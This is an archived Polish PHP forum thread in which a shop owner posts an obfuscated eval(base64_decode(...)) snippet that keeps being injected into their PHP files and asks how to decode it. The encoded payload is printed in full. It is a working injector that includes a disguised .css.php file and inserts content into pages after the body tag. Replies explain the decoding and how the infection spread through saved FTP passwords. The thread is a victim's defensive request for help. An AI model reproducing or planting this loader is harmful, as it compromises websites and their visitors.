Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [PHP]Jak odkodowąc to? (base64) ponawiam pytanie bo zostało zamknięte niesłusznie.
Forum PHP.pl > Forum > Przedszkole
pixel22
19.11.2009, 08:30:42
Próbowałem notatnikiem++, online i nic z tego
To jest złośliwy kod który jest dodawany do każdego pliku php na moim sklepie internetowym, wiec nie zamykajcie tego postu.exclamation.gif!!!!!
Kod
<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p
KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9zZWFydC9mdHAvY2F0YWxv
Z
y9hZG1pbi90aW55bWNlL3BsdWdpbnMvaW5saW5lcG9wdXBzL3NraW5zL2NsZWFybG9va3MyL2ltZy9zd
H
lsZS5jc3MucGhwJykpe2luY2x1ZGVfb25jZSgnL2hvbWUvc2VhcnQvZnRwL2NhdGFsb2cvYWRtaW4vdG
l
ueW1jZS9wbHVnaW5zL2lubGluZXBvcHVwcy9za2lucy9jbGVhcmxvb2tzMi9pbWcvc3R5bGUuY3NzLnB
o
cCcpO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJiFmdW5jdGlvbl9leGlzdHMoJ2Rnb2JoJykpe2lm
K
CFmdW5jdGlvbl9leGlzdHMoJ2d6ZGVjb2RlJykpe2Z1bmN0aW9uIGd6ZGVjb2RlKCRSMjBGRDY1RTlDN
z
QwNjAzNEZBREM2ODJGMDY3MzI4NjgpeyRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkI9b3
J
kKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LDMsMSkpOyRSNjAxNjlDRDF
D
NDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9MTA7JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkz
M
T0wO2lmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImNCl7JFIwRDU0MjM2REEyMDU5N
E
VDMTNGQzgxQjIwOTczMzkzMT11bnBhY2soJ3YnLHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNj
g
yRjA2NzMyODY4LDEwLDIpKTskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPSRSMEQ1NDI
z
NkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzFbMV07JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYz
N
UU0MSs9MiskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxO31pZigkUjZCNkU5OENERThCM
z
MwODdBMzNFNEQzQTQ5N0JEODZCJjgpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3
R
ycG9zKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDd
C
N0E3QTg1QUI0NEY4ODQ2MzVFNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4
N
kImMTYpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDE9c3RycG9zKCRSMjBGRDY1RTlDN
z
QwNjAzNEZBREM2ODJGMDY3MzI4NjgsY2hyKDApLCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2Mz
V
FNDEpKzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImMil7JFI2MDE2OUNEMUM
0
N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSs9Mjt9JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1
M
z1nemluZmxhdGUoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsJFI2MDE2O
U
NEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkpO2lmKCRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRk
F
FMzlGNTM9PT1GQUxTRSl7JFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz0kUjIwRkQ2NUU
5
Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4O31yZXR1cm4gJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFG
Q
UUzOUY1Mzt9fWZ1bmN0aW9uIGRnb2JoKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMyRjAzRDI2NUUwQ0Ype
0
hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQj
k
xRTJFOTA9Z3pkZWNvZGUoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRik7aWYocHJlZ19
t
YXRjaCgnL1w8Ym9keS9zaScsJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCkpe3JldHVy
b
iBwcmVnX3JlcGxhY2UoJy8oXDxib2R5W15cPl0qXD4pL3NpJywnJDEnLmdtbCgpLCRSM0UzM0UwMTdDR
D
c2QjlCN0U2QzczNjRGQjkxRTJFOTApO31lbHNle3JldHVybiBnbWwoKS4kUjNFMzNFMDE3Q0Q3NkI5Qj
d
FNkM3MzY0RkI5MUUyRTkwO319b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19')); ?>
Meares
19.11.2009, 08:45:44
base64_decode()
pixel22
19.11.2009, 08:49:49
Cytat(Meares @ 19.11.2009, 08:45:44 ) *
base64_decode()

Chyba encode, ale pisałem że już probowałem na stronach typu http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/ i nic z tego
korro
19.11.2009, 08:55:12
Właśnie decode, skoro jest już w base64,to trzeba zdekodować.
vokiel
19.11.2009, 09:03:29
@pixel22
Przecież maż w skrypcie napisane: 
[PHP] pobierz, plaintext 
  1. eval(base64_decode(/*zakodowana tresc*/));
[PHP] pobierz, plaintext
Zobacz co robi funcja eval, base64_decode. Przecież ten skrypt sam się odkodowuje. Tylko co z tego, skoro jego treść jest jeszcze zaciemniona.

edit:
Nie wiem jak Ty używałeś strony opinionatedgeek.com, bo sprawdzałem i działa poprawnie.

Może po prostu nie znasz podstaw podstaw?
skowron-line
19.11.2009, 09:04:54
Cytat(pixel22 @ 19.11.2009, 08:49:49 ) *
Chyba encode, ale pisałem że już probowałem (...) i nic z tego

To chyba słabo próbowałeś bo base64_decode odkoduje Ci to wywal ze swojego kodu ten eval i zobacz co się pokaże.
l3l0
19.11.2009, 09:17:01
http://forum.joomla.org/viewtopic.php?f=267&t=353314
Fifi209
19.11.2009, 09:35:40
To tak, skoro się do plików dodaje, to zapewne zapamiętałeś gdzieś hasło do ftp np. total commander, radzę zmienić hasło i go nigdzie nie zapamiętywać.
pixel22
19.11.2009, 09:42:51
oki mam. wielkie dzięki no nie znam dlatego napisałem w przedszkolu.
No i teraz wysżło gdzie jest bład, na forum oscommerce polecili mi wgrac moduł tinymce a tam właśnie to jest
piotr94
19.11.2009, 11:15:56
Ja miałem tego samego wirusa na swoich stronach kiedyś.
Działa on tak:
1. masz zarażony komputer, na nim total cmd z zapisanymi hasłami do ftp.
2. łączysz się przez total cmd z serwerem, robisz jakieś zmiany, zamykasz połączenie i total cmd
3. wirus się łączy z serwerem i dogrywa się do strony www
4. wirus próbuje zawirusować komputery ludzi odwiedzających tę stronę
także zacznij od sprawdzenia czy nie masz wirusa na kompie ;-)
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.